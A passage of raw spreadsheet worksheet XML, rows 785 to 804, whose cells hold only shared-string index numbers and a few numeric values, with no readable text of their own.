      <c r="B785" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D785" s="12" t="s">
        <v>29030</v>
      </c>
      <c r="E785" s="12" t="s">
        <v>31430</v>
      </c>
      <c r="F785" s="12" t="s">
        <v>29017</v>
      </c>
      <c r="G785" s="12" t="s">
        <v>5948</v>
      </c>
      <c r="H785" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I785" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J785" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K785" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L785" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M785" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N785" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O785" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P785" s="12" t="s">
        <v>5949</v>
      </c>
      <c r="Q785" s="12">
        <v>2.6</v>
      </c>
      <c r="R785" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S785" s="12" t="s">
        <v>5950</v>
      </c>
      <c r="T785" s="12" t="s">
        <v>5951</v>
      </c>
      <c r="U785" s="12" t="s">
        <v>5952</v>
      </c>
      <c r="V785" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W785" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X785" s="12">
        <v>2</v>
      </c>
      <c r="Y785" s="12" t="s">
        <v>5953</v>
      </c>
    </row>
    <row r="786" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A786" s="12">
        <v>3964</v>
      </c>
      <c r="B786" s="12" t="s">
        <v>28259</v>
      </c>
      <c r="C786" s="12" t="s">
        <v>29032</v>
      </c>
      <c r="D786" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F786" s="12" t="s">
        <v>29031</v>
      </c>
      <c r="G786" s="12" t="s">
        <v>5960</v>
      </c>
      <c r="H786" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I786" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J786" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K786" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L786" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M786" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N786" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O786" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P786" s="12" t="s">
        <v>5961</v>
      </c>
      <c r="Q786" s="12">
        <v>2.6</v>
      </c>
      <c r="R786" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S786" s="12" t="s">
        <v>5962</v>
      </c>
      <c r="T786" s="12" t="s">
        <v>3562</v>
      </c>
      <c r="U786" s="12" t="s">
        <v>5120</v>
      </c>
      <c r="V786" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W786" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X786" s="12">
        <v>5</v>
      </c>
      <c r="Y786" s="12" t="s">
        <v>5963</v>
      </c>
    </row>
    <row r="787" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A787" s="12">
        <v>3966</v>
      </c>
      <c r="B787" s="12" t="s">
        <v>29033</v>
      </c>
      <c r="D787" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F787" s="12" t="s">
        <v>29034</v>
      </c>
      <c r="G787" s="12" t="s">
        <v>5964</v>
      </c>
      <c r="H787" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I787" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J787" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K787" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L787" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M787" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N787" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O787" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P787" s="12" t="s">
        <v>4122</v>
      </c>
      <c r="Q787" s="12">
        <v>2.6</v>
      </c>
      <c r="R787" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S787" s="12" t="s">
        <v>5965</v>
      </c>
      <c r="T787" s="12" t="s">
        <v>3468</v>
      </c>
      <c r="U787" s="12" t="s">
        <v>5966</v>
      </c>
      <c r="V787" s="12" t="s">
        <v>4704</v>
      </c>
      <c r="W787" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X787" s="12">
        <v>1</v>
      </c>
      <c r="Y787" s="12" t="s">
        <v>5967</v>
      </c>
    </row>
    <row r="788" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A788" s="12">
        <v>3967</v>
      </c>
      <c r="B788" s="12" t="s">
        <v>29035</v>
      </c>
      <c r="C788" s="12" t="s">
        <v>28414</v>
      </c>
      <c r="D788" s="12" t="s">
        <v>29036</v>
      </c>
      <c r="E788" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F788" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G788" s="12" t="s">
        <v>5968</v>
      </c>
      <c r="H788" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I788" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J788" s="12" t="s">
        <v>744</v>
      </c>
      <c r="K788" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L788" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M788" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N788" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O788" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P788" s="12" t="s">
        <v>4122</v>
      </c>
      <c r="Q788" s="12">
        <v>2.6</v>
      </c>
      <c r="R788" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S788" s="12" t="s">
        <v>5969</v>
      </c>
      <c r="T788" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="U788" s="12" t="s">
        <v>747</v>
      </c>
      <c r="V788" s="12" t="s">
        <v>2864</v>
      </c>
      <c r="W788" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X788" s="12">
        <v>4</v>
      </c>
      <c r="Y788" s="12" t="s">
        <v>5970</v>
      </c>
    </row>
    <row r="789" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A789" s="12">
        <v>3984</v>
      </c>
      <c r="B789" s="12" t="s">
        <v>29037</v>
      </c>
      <c r="D789" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F789" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G789" s="12" t="s">
        <v>5975</v>
      </c>
      <c r="H789" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I789" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J789" s="12" t="s">
        <v>1203</v>
      </c>
      <c r="K789" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L789" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M789" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N789" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O789" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P789" s="12" t="s">
        <v>5976</v>
      </c>
      <c r="Q789" s="12">
        <v>2.6</v>
      </c>
      <c r="R789" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S789" s="12" t="s">
        <v>5977</v>
      </c>
      <c r="T789" s="12" t="s">
        <v>5978</v>
      </c>
      <c r="U789" s="12" t="s">
        <v>5979</v>
      </c>
      <c r="V789" s="12" t="s">
        <v>4176</v>
      </c>
      <c r="W789" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X789" s="12">
        <v>6</v>
      </c>
      <c r="Y789" s="12" t="s">
        <v>5980</v>
      </c>
    </row>
    <row r="790" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A790" s="12">
        <v>3990</v>
      </c>
      <c r="B790" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C790" s="12" t="s">
        <v>28357</v>
      </c>
      <c r="D790" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F790" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G790" s="12" t="s">
        <v>5981</v>
      </c>
      <c r="H790" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I790" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J790" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K790" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L790" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M790" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N790" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O790" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P790" s="12" t="s">
        <v>5982</v>
      </c>
      <c r="Q790" s="12">
        <v>2.6</v>
      </c>
      <c r="R790" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S790" s="12" t="s">
        <v>5983</v>
      </c>
      <c r="T790" s="12" t="s">
        <v>5984</v>
      </c>
      <c r="U790" s="12" t="s">
        <v>5985</v>
      </c>
      <c r="V790" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W790" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X790" s="12">
        <v>12</v>
      </c>
      <c r="Y790" s="12" t="s">
        <v>5986</v>
      </c>
    </row>
    <row r="791" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A791" s="12">
        <v>3991</v>
      </c>
      <c r="B791" s="12" t="s">
        <v>28356</v>
      </c>
      <c r="C791" s="12" t="s">
        <v>28357</v>
      </c>
      <c r="D791" s="12" t="s">
        <v>28348</v>
      </c>
      <c r="E791" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F791" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G791" s="12" t="s">
        <v>5987</v>
      </c>
      <c r="H791" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I791" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J791" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K791" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L791" s="12" t="s">
        <v>66</v>
      </c>
      <c r="M791" s="12" t="s">
        <v>31584</v>
      </c>
      <c r="N791" s="12" t="s">
        <v>31597</v>
      </c>
      <c r="O791" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P791" s="12" t="s">
        <v>4774</v>
      </c>
      <c r="Q791" s="12">
        <v>2.6</v>
      </c>
      <c r="R791" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S791" s="12" t="s">
        <v>5988</v>
      </c>
      <c r="T791" s="12" t="s">
        <v>5989</v>
      </c>
      <c r="U791" s="12" t="s">
        <v>5990</v>
      </c>
      <c r="V791" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W791" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X791" s="12">
        <v>2</v>
      </c>
      <c r="Y791" s="12" t="s">
        <v>5991</v>
      </c>
    </row>
    <row r="792" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A792" s="12">
        <v>3992</v>
      </c>
      <c r="B792" s="12" t="s">
        <v>28353</v>
      </c>
      <c r="D792" s="12" t="s">
        <v>28346</v>
      </c>
      <c r="F792" s="12" t="s">
        <v>29763</v>
      </c>
      <c r="G792" s="12" t="s">
        <v>5992</v>
      </c>
      <c r="H792" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I792" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J792" s="12" t="s">
        <v>65</v>
      </c>
      <c r="K792" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L792" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M792" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N792" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O792" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P792" s="12" t="s">
        <v>4122</v>
      </c>
      <c r="Q792" s="12">
        <v>2.6</v>
      </c>
      <c r="R792" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S792" s="12" t="s">
        <v>5993</v>
      </c>
      <c r="T792" s="12" t="s">
        <v>5994</v>
      </c>
      <c r="U792" s="12" t="s">
        <v>5995</v>
      </c>
      <c r="V792" s="12" t="s">
        <v>70</v>
      </c>
      <c r="W792" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X792" s="12">
        <v>2</v>
      </c>
      <c r="Y792" s="12" t="s">
        <v>5996</v>
      </c>
    </row>
    <row r="793" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A793" s="12">
        <v>4000</v>
      </c>
      <c r="B793" s="12" t="s">
        <v>28377</v>
      </c>
      <c r="D793" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F793" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G793" s="12" t="s">
        <v>6002</v>
      </c>
      <c r="H793" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I793" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J793" s="12" t="s">
        <v>103</v>
      </c>
      <c r="K793" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L793" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M793" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N793" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O793" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P793" s="12" t="s">
        <v>4122</v>
      </c>
      <c r="Q793" s="12">
        <v>2.6</v>
      </c>
      <c r="R793" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S793" s="12" t="s">
        <v>6003</v>
      </c>
      <c r="T793" s="12" t="s">
        <v>6004</v>
      </c>
      <c r="U793" s="12" t="s">
        <v>6005</v>
      </c>
      <c r="V793" s="12" t="s">
        <v>1174</v>
      </c>
      <c r="W793" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X793" s="12">
        <v>8</v>
      </c>
      <c r="Y793" s="12" t="s">
        <v>6006</v>
      </c>
    </row>
    <row r="794" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A794" s="12">
        <v>4012</v>
      </c>
      <c r="B794" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D794" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F794" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G794" s="12" t="s">
        <v>6018</v>
      </c>
      <c r="H794" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I794" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J794" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K794" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L794" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M794" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N794" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O794" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P794" s="12" t="s">
        <v>4122</v>
      </c>
      <c r="Q794" s="12">
        <v>2.6</v>
      </c>
      <c r="R794" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S794" s="12" t="s">
        <v>6019</v>
      </c>
      <c r="T794" s="12" t="s">
        <v>5333</v>
      </c>
      <c r="U794" s="12" t="s">
        <v>6020</v>
      </c>
      <c r="V794" s="12" t="s">
        <v>57</v>
      </c>
      <c r="W794" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X794" s="12">
        <v>5</v>
      </c>
      <c r="Y794" s="12" t="s">
        <v>6021</v>
      </c>
    </row>
    <row r="795" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A795" s="12">
        <v>4013</v>
      </c>
      <c r="B795" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D795" s="12" t="s">
        <v>29015</v>
      </c>
      <c r="F795" s="12" t="s">
        <v>29015</v>
      </c>
      <c r="G795" s="12" t="s">
        <v>6022</v>
      </c>
      <c r="H795" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I795" s="12" t="s">
        <v>35</v>
      </c>
      <c r="J795" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K795" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L795" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M795" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N795" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O795" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P795" s="12" t="s">
        <v>6023</v>
      </c>
      <c r="Q795" s="12">
        <v>2.6</v>
      </c>
      <c r="R795" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S795" s="12" t="s">
        <v>6024</v>
      </c>
      <c r="T795" s="12" t="s">
        <v>2089</v>
      </c>
      <c r="U795" s="12" t="s">
        <v>6025</v>
      </c>
      <c r="V795" s="12" t="s">
        <v>3800</v>
      </c>
      <c r="W795" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X795" s="12">
        <v>6</v>
      </c>
      <c r="Y795" s="12" t="s">
        <v>6026</v>
      </c>
    </row>
    <row r="796" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A796" s="12">
        <v>4014</v>
      </c>
      <c r="B796" s="12" t="s">
        <v>28390</v>
      </c>
      <c r="C796" s="12" t="s">
        <v>29038</v>
      </c>
      <c r="D796" s="12" t="s">
        <v>28997</v>
      </c>
      <c r="F796" s="12" t="s">
        <v>29039</v>
      </c>
      <c r="G796" s="12" t="s">
        <v>6027</v>
      </c>
      <c r="H796" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I796" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J796" s="12" t="s">
        <v>2451</v>
      </c>
      <c r="K796" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L796" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M796" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N796" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O796" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P796" s="12" t="s">
        <v>4122</v>
      </c>
      <c r="Q796" s="12">
        <v>2.6</v>
      </c>
      <c r="R796" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S796" s="12" t="s">
        <v>6028</v>
      </c>
      <c r="T796" s="12" t="s">
        <v>6029</v>
      </c>
      <c r="U796" s="12" t="s">
        <v>6030</v>
      </c>
      <c r="V796" s="12" t="s">
        <v>5074</v>
      </c>
      <c r="W796" s="12">
        <v>4224</v>
      </c>
      <c r="X796" s="12">
        <v>28</v>
      </c>
      <c r="Y796" s="12" t="s">
        <v>6031</v>
      </c>
    </row>
    <row r="797" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A797" s="12">
        <v>4016</v>
      </c>
      <c r="B797" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D797" s="12" t="s">
        <v>28981</v>
      </c>
      <c r="E797" s="12" t="s">
        <v>31425</v>
      </c>
      <c r="F797" s="12" t="s">
        <v>29015</v>
      </c>
      <c r="G797" s="12" t="s">
        <v>6032</v>
      </c>
      <c r="H797" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I797" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J797" s="12" t="s">
        <v>52</v>
      </c>
      <c r="K797" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L797" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M797" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N797" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O797" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P797" s="12" t="s">
        <v>6033</v>
      </c>
      <c r="Q797" s="12">
        <v>2.6</v>
      </c>
      <c r="R797" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S797" s="12" t="s">
        <v>6034</v>
      </c>
      <c r="T797" s="12" t="s">
        <v>3562</v>
      </c>
      <c r="U797" s="12" t="s">
        <v>6035</v>
      </c>
      <c r="V797" s="12" t="s">
        <v>2391</v>
      </c>
      <c r="W797" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X797" s="12">
        <v>12</v>
      </c>
      <c r="Y797" s="12" t="s">
        <v>6036</v>
      </c>
    </row>
    <row r="798" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A798" s="12">
        <v>4022</v>
      </c>
      <c r="B798" s="12" t="s">
        <v>28232</v>
      </c>
      <c r="D798" s="12" t="s">
        <v>29040</v>
      </c>
      <c r="F798" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G798" s="12" t="s">
        <v>6038</v>
      </c>
      <c r="H798" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I798" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J798" s="12" t="s">
        <v>194</v>
      </c>
      <c r="K798" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L798" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M798" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N798" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O798" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P798" s="12" t="s">
        <v>4267</v>
      </c>
      <c r="Q798" s="12">
        <v>2.6</v>
      </c>
      <c r="R798" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S798" s="12" t="s">
        <v>6039</v>
      </c>
      <c r="T798" s="12" t="s">
        <v>6040</v>
      </c>
      <c r="U798" s="12" t="s">
        <v>6041</v>
      </c>
      <c r="V798" s="12" t="s">
        <v>4704</v>
      </c>
      <c r="W798" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X798" s="12">
        <v>1</v>
      </c>
      <c r="Y798" s="12" t="s">
        <v>6042</v>
      </c>
    </row>
    <row r="799" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A799" s="12">
        <v>4027</v>
      </c>
      <c r="B799" s="12" t="s">
        <v>29041</v>
      </c>
      <c r="C799" s="12" t="s">
        <v>28984</v>
      </c>
      <c r="D799" s="12" t="s">
        <v>28997</v>
      </c>
      <c r="F799" s="12" t="s">
        <v>29042</v>
      </c>
      <c r="G799" s="12" t="s">
        <v>6043</v>
      </c>
      <c r="H799" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I799" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J799" s="12" t="s">
        <v>1269</v>
      </c>
      <c r="K799" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L799" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M799" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N799" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O799" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P799" s="12" t="s">
        <v>6044</v>
      </c>
      <c r="Q799" s="12">
        <v>2.6</v>
      </c>
      <c r="R799" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S799" s="12" t="s">
        <v>6045</v>
      </c>
      <c r="T799" s="12" t="s">
        <v>4159</v>
      </c>
      <c r="U799" s="12" t="s">
        <v>6046</v>
      </c>
      <c r="V799" s="12" t="s">
        <v>3176</v>
      </c>
      <c r="W799" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X799" s="12">
        <v>7</v>
      </c>
      <c r="Y799" s="12" t="s">
        <v>6047</v>
      </c>
    </row>
    <row r="800" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A800" s="12">
        <v>4037</v>
      </c>
      <c r="B800" s="12" t="s">
        <v>29016</v>
      </c>
      <c r="D800" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F800" s="12" t="s">
        <v>28997</v>
      </c>
      <c r="G800" s="12" t="s">
        <v>6048</v>
      </c>
      <c r="H800" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I800" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J800" s="12" t="s">
        <v>28</v>
      </c>
      <c r="K800" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L800" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M800" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N800" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O800" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P800" s="12" t="s">
        <v>6049</v>
      </c>
      <c r="Q800" s="12">
        <v>2.6</v>
      </c>
      <c r="R800" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S800" s="12" t="s">
        <v>6050</v>
      </c>
      <c r="T800" s="12" t="s">
        <v>5951</v>
      </c>
      <c r="U800" s="12" t="s">
        <v>6051</v>
      </c>
      <c r="V800" s="12" t="s">
        <v>323</v>
      </c>
      <c r="W800" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X800" s="12">
        <v>4</v>
      </c>
      <c r="Y800" s="12" t="s">
        <v>6052</v>
      </c>
    </row>
    <row r="801" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A801" s="12">
        <v>4040</v>
      </c>
      <c r="B801" s="12" t="s">
        <v>29043</v>
      </c>
      <c r="D801" s="12" t="s">
        <v>29020</v>
      </c>
      <c r="E801" s="12" t="s">
        <v>31427</v>
      </c>
      <c r="F801" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="G801" s="12" t="s">
        <v>6053</v>
      </c>
      <c r="H801" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I801" s="12" t="s">
        <v>43</v>
      </c>
      <c r="J801" s="12" t="s">
        <v>96</v>
      </c>
      <c r="K801" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L801" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M801" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N801" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O801" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P801" s="12" t="s">
        <v>5210</v>
      </c>
      <c r="Q801" s="12">
        <v>2.6</v>
      </c>
      <c r="R801" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S801" s="12" t="s">
        <v>6054</v>
      </c>
      <c r="T801" s="12" t="s">
        <v>6055</v>
      </c>
      <c r="U801" s="12" t="s">
        <v>6056</v>
      </c>
      <c r="V801" s="12" t="s">
        <v>1923</v>
      </c>
      <c r="W801" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X801" s="12">
        <v>4</v>
      </c>
      <c r="Y801" s="12" t="s">
        <v>6057</v>
      </c>
    </row>
    <row r="802" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A802" s="12">
        <v>4041</v>
      </c>
      <c r="B802" s="12" t="s">
        <v>29044</v>
      </c>
      <c r="C802" s="12" t="s">
        <v>29045</v>
      </c>
      <c r="D802" s="12" t="s">
        <v>28349</v>
      </c>
      <c r="E802" s="12" t="s">
        <v>31442</v>
      </c>
      <c r="F802" s="12" t="s">
        <v>28986</v>
      </c>
      <c r="G802" s="12" t="s">
        <v>6058</v>
      </c>
      <c r="H802" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I802" s="12" t="s">
        <v>51</v>
      </c>
      <c r="J802" s="12" t="s">
        <v>347</v>
      </c>
      <c r="K802" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L802" s="12" t="s">
        <v>53</v>
      </c>
      <c r="M802" s="12" t="s">
        <v>31583</v>
      </c>
      <c r="N802" s="12" t="s">
        <v>31596</v>
      </c>
      <c r="O802" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P802" s="12" t="s">
        <v>6059</v>
      </c>
      <c r="Q802" s="12" t="s">
        <v>28287</v>
      </c>
      <c r="R802" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S802" s="12" t="s">
        <v>6060</v>
      </c>
      <c r="T802" s="12" t="s">
        <v>2089</v>
      </c>
      <c r="U802" s="12" t="s">
        <v>5895</v>
      </c>
      <c r="V802" s="12" t="s">
        <v>3725</v>
      </c>
      <c r="W802" s="12">
        <v>4160</v>
      </c>
      <c r="X802" s="12">
        <v>51</v>
      </c>
      <c r="Y802" s="12" t="s">
        <v>6061</v>
      </c>
    </row>
    <row r="803" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A803" s="12">
        <v>4050</v>
      </c>
      <c r="B803" s="12" t="s">
        <v>29046</v>
      </c>
      <c r="D803" s="12" t="s">
        <v>28347</v>
      </c>
      <c r="F803" s="12" t="s">
        <v>29047</v>
      </c>
      <c r="G803" s="12" t="s">
        <v>6067</v>
      </c>
      <c r="H803" s="12" t="s">
        <v>21</v>
      </c>
      <c r="I803" s="12" t="s">
        <v>111</v>
      </c>
      <c r="J803" s="12" t="s">
        <v>1269</v>
      </c>
      <c r="K803" s="12" t="s">
        <v>350</v>
      </c>
      <c r="L803" s="12" t="s">
        <v>16</v>
      </c>
      <c r="M803" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="N803" s="12" t="s">
        <v>31582</v>
      </c>
      <c r="O803" s="12" t="s">
        <v>31588</v>
      </c>
      <c r="P803" s="12" t="s">
        <v>4122</v>
      </c>
      <c r="Q803" s="12">
        <v>2.6</v>
      </c>
      <c r="R803" s="12" t="s">
        <v>17</v>
      </c>
      <c r="S803" s="12" t="s">
        <v>6068</v>
      </c>
      <c r="T803" s="12" t="s">
        <v>6069</v>
      </c>
      <c r="U803" s="12" t="s">
        <v>6070</v>
      </c>
      <c r="V803" s="12" t="s">
        <v>1785</v>
      </c>
      <c r="W803" s="12" t="s">
        <v>20</v>
      </c>
      <c r="X803" s="12">
        <v>2</v>
      </c>
      <c r="Y803" s="12" t="s">
        <v>6071</v>
      </c>
    </row>
    <row r="804" spans="1:25" ht="14" customHeight="1" x14ac:dyDescent="0.3">
      <c r="A804" s="12">
        <v>4055</v>
      </c>
      <c r="B804" s="12" t="s">
        <v>28375</v>
      </c>
